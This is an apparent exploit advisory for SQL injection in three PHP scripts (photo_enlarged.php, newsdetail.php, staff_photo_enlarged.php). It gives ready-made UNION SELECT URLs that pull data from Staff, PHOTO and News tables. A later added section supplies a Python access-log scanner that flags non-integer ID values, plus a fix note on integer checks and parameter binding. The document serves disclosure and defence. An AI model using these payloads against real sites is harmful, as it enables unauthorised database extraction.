SQL injection
1. photo_enlarged.php file, Photo_ID parameter
2. newsdetail.php file, NID parameter
3. staff_photo_enlarged.php file, Staff_ID parameter
http://website/photo_enlarged.php?Photo_ID='sql
http://website/newsdetail.php?NID='sql
http://website/staff_photo_enlarged.php?Staff_ID='sql
Example:
http://localhost/staff_photo_enlarged.php?Staff_ID=-1+union+select+1,2,3,4,5,6+from+Staff
http://localhost/photo_enlarged.php?Photo_ID=-1+union+select+1,2,3,4,5,6,7,8,9,1+from+PHOTO
http://localhost/newsdetail.php?NID=-1+union+select+1,2,3,4,5+from+News
http://localhost/newsdetail.php?NID=-1+union+select+News_date,news_id,3,news_date,5+from+News
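Added example (not part of the original advisory): a log check that flags requests to the three affected scripts when the listed ID parameter is not a plain integer. It assumes legitimate IDs are non-negative integers and that the server writes combined-format access logs; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script -> ID parameter, as listed in the advisory.
ID_PARAMS = {
    "photo_enlarged.php": "Photo_ID",
    "newsdetail.php": "NID",
    "staff_photo_enlarged.php": "Staff_ID",
}
# Assumption: a legitimate ID is a plain non-negative integer.
VALID_ID = re.compile(r"[0-9]{1,10}")
# Request field of a combined-format log line: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')


def suspicious_id(target):
    """Return (script, param, value) for a non-integer ID, else None."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1].lower()
    param = ID_PARAMS.get(script)
    if param is None:
        return None
    # parse_qs URL-decodes values, so %27 and '+' are seen as ' and space.
    values = parse_qs(parts.query, keep_blank_values=True).get(param, [])
    for value in values:
        if not VALID_ID.fullmatch(value):
            return (script, param, value)
    return None


def scan(lines):
    """Return (line_number, script, param, value) for each flagged line."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        hit = suspicious_id(m.group(1)) if m else None
        if hit:
            hits.append((lineno, *hit))
    return hits


# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /newsdetail.php?NID=12 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2024:10:00:05 +0000] "GET /newsdetail.php?NID=-1+union+select+1,2,3,4,5+from+News HTTP/1.1" 200 812',
    '192.0.2.44 - - [01/Jan/2024:10:00:09 +0000] "GET /staff_photo_enlarged.php?Staff_ID=%27 HTTP/1.1" 500 0',
    '192.0.2.10 - - [01/Jan/2024:10:00:15 +0000] "GET /index.php?NID=abc HTTP/1.1" 200 100',
]
if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

The same integer-only rule is the server-side fix: reject or cast the ID before it reaches the query, and bind it as a parameter rather than concatenating it.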
Credit: Liz0ziM
E-mail: [email protected]
Site: www.biyo.tk www.biyosecurity.be
Greetz: All my friends
Source:
http://www.blogcu.com/Liz0ziM/714903/
http://liz0zim.no-ip.org/cline.txt
http://biyosecurity.be/bugs/cline.txt